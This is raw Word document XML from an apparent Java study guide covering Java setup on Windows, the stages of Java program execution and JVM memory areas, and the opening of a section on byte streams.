    <w:p w14:paraId="4AE6F145" w14:textId="77777777" w:rsidR="005C726C" w:rsidRPr="00CE4B95" w:rsidRDefault="005C726C" w:rsidP="005C726C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3598AB57" w14:textId="75FB5924" w:rsidR="005C726C" w:rsidRPr="00CE4B95" w:rsidRDefault="005C726C" w:rsidP="00EF54D0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">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CE4B95"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CE4B95" w:rsidRDefault="008B3961">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc197867217"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How to configure java in windows?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="00FBD666" w14:textId="3B9E0437" w:rsidR="00E72EA3" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72EA3" w:rsidP="00FF7743">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1: Download Java JDK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585CC47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o the official Oracle website or OpenJDK site:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EB13E0"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CE4B95">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>Oracle JDK</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A667894"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CE4B95">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>OpenJDK (Adoptium)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="582C9783"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wnload the installer for Windows x64.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BD5CF3"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Install Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584C9BBA"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the installer (.msi or .exe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFF1D6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oose installation path (e.g., C:\Program Files\Java\jdk-21)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F17519C"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e the installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA27DB4"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3: Set Environment Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0377FABE"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et JAVA_HOME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDB0804"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System Properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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System Variables, click New:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F7EC6F" w14:textId="77777777"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AVA_HOME  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA5857C" w14:textId="21C73B61"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gram </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Files</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\Java\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43C9365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Add to Path variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1937572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same "Environment Variables" window:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B16D33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 Path under System Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B3098E"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 Edit → New and add:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC3C7C3" w14:textId="672254F2"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_H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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A055518"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4: Verify Java Installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4882B76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Command Prompt and run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE6FD97" w14:textId="6C90FD5A"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10905A8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utput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22246BBF" w14:textId="77777777"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">java version </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"21.0.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2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7</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> LTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267A28D7" w14:textId="612527F3"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660066"/>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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Runti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viron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B91AB0"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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340EF44D" w14:textId="06FF64A9"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399E070D"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verify the Java compiler (javac) is set correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767F7266" w14:textId="3F7709FB" w:rsidR="00E72EA3" w:rsidRPr="00CE4B95"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CE4B95" w:rsidRDefault="00D70CC4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc197867218"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explain Java Program </w:t>
      </w:r>
      <w:r w:rsidR="00FF5A4B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="7377B7F8" w14:textId="4DFCC286" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D431F3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="005D799E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Writing the Source Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D9A97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You create a .java file containing your Java code (e.g., HelloWorld.java)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03481F1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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2008F2E2"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elloWorl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5A9A73"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E3F92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Hello, World!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDA430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B465A8D" w14:textId="3A5E47FF"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674BE47" w14:textId="77777777" w:rsidR="00B82862" w:rsidRPr="00CE4B95" w:rsidRDefault="00B82862" w:rsidP="00C15401">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F8B771E" w14:textId="59BE594D"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Compilation (javac)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4465844D"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The Java compiler (javac) converts your source code into </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bytecode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> (platform-independent intermediate code)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059165FA"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Creates .class files (e.g., HelloWorld.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3601DFCB"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Bytecode is not machine code - it's instructions for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java Virtual Machine (JVM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D01A27" w14:textId="77777777" w:rsidR="00E82391" w:rsidRPr="00CE4B95" w:rsidRDefault="00E82391" w:rsidP="00C15401">
      <w:pPr>
        <w:ind w:left="-360" w:firstLine="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C4D58BB" w14:textId="77777777" w:rsidR="00E82391" w:rsidRPr="00CE4B95" w:rsidRDefault="00E82391" w:rsidP="00C15401">
      <w:pPr>
        <w:ind w:left="-360" w:firstLine="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00F33C87" w14:textId="37882056" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E" w:rsidP="00C15401">
      <w:pPr>
        <w:ind w:left="-360" w:firstLine="108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3. Class Loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E65A8FD"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When you run java HelloWorld:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D10B040"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a) Bootstrap ClassLoader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34467163"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ore Java classes (from rt.jar and other core libraries)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D78B504"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Written in native code (not Java)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC509F5"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b) Extension ClassLoader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241BDBFD" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>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lasses from Java extension directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD3469C"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c) Application ClassLoader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5348B65F" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>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your application classes (from the classpath)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3790BD34" w14:textId="022AC53B" w:rsidR="00BD0987" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0987" w:rsidP="00BD0987">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2789435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4. Bytecode Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E91880"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JVM verifies the bytecode to ensure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245DD3AC"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illegal memory access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8E39E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Proper stack manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715083F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Correct method calls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E3C99D"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violation of access restrictions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BA6414"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is provides security by preventing malicious code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D86A19" w14:textId="77777777" w:rsidR="00BD0987" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0987" w:rsidP="00BD0987">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A9E17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5. Just-In-Time (JIT) Compilation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEAFC60"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e JVM's JIT compiler converts frequently executed bytecode into </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>native machine code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE0B41D"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Happens at runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696A69B7"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Optimizes performance by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32667F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Inlining methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213AF76A"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Removing dead code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3272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Optimizing loops</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D7B731" w14:textId="77777777" w:rsidR="00BD0987" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0987" w:rsidP="00BD0987">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20644B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6. Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A3E7B7" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The JVM executes the program:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FD3B70"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Creates the main thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DDF701"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Allocates memory for objects in the Heap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B59A77F"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Manages method calls using the Stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197B8D94"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Handles garbage collection automatically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7332F524" w14:textId="77777777" w:rsidR="007721FC" w:rsidRPr="00CE4B95" w:rsidRDefault="007721FC" w:rsidP="00C15401">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33F32375"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7. Runtime Memory Areas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A41E4B"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The JVM manages these memory areas during execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602ACE1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a) Method Area</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6531B7C0" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>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class structures, method code, and static variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6327B4"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b) Heap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F6EDE5"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all objects and their instance variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71114B4C"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Garbage collection works here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F828C09"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c) JVM Stacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E42FEA1"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Each thread has its own stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2F134C"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frames for each method call (local variables, operands, return values)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180415E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d) PC Registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC97A89" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>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Tracks the execution position for each thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6ED361"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e) Native Method Stacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B00295" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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For native code (non-Java code)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5DEDBB" w14:textId="77777777" w:rsidR="00BD0987" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD0987" w:rsidP="00BD0987">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="705FFFDE"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8. Garbage Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE7DDA9"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Automatically reclaims memory from objects no longer in use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332F7988"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Runs in the background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5627C7"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Different algorithms available (Serial, Parallel, G1, ZGC, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571E06E3" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E" w:rsidP="00552EC7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01869D7F" w14:textId="77777777" w:rsidR="00BC7A53" w:rsidRPr="00CE4B95" w:rsidRDefault="00BC7A53" w:rsidP="00D70CC4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6166BF75" w14:textId="77777777" w:rsidR="00BC7A53" w:rsidRPr="00CE4B95" w:rsidRDefault="00BC7A53" w:rsidP="00D70CC4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E2A1855" w14:textId="2454B9C0" w:rsidR="00DD113C" w:rsidRPr="00CE4B95" w:rsidRDefault="00D70CC4" w:rsidP="00D70CC4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">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CE4B95"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CE4B95" w:rsidRDefault="00BC7A53">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc197867219"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain the byte stream in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="4FC3FA3D" w14:textId="1010D934" w:rsidR="007F1325" w:rsidRPr="00CE4B95" w:rsidRDefault="007F1325" w:rsidP="007F1325">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Classes (Hierarchy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39320E22"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CE4B95" w14:paraId="16C477E5" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50550677"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rection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F1325" w:rsidRPr="00CE4B95" w14:paraId="61886F31" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A385C3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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F1325" w:rsidRPr="00CE4B95" w14:paraId="7B078722" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A1E9DE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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7F1B444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CE4B95" w14:paraId="44BE5B32" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54183063"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322D5140" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55BD5F0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file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F1325" w:rsidRPr="00CE4B95" w14:paraId="1EAF58DA" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F92D12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efficiently using a buffer</w:t>
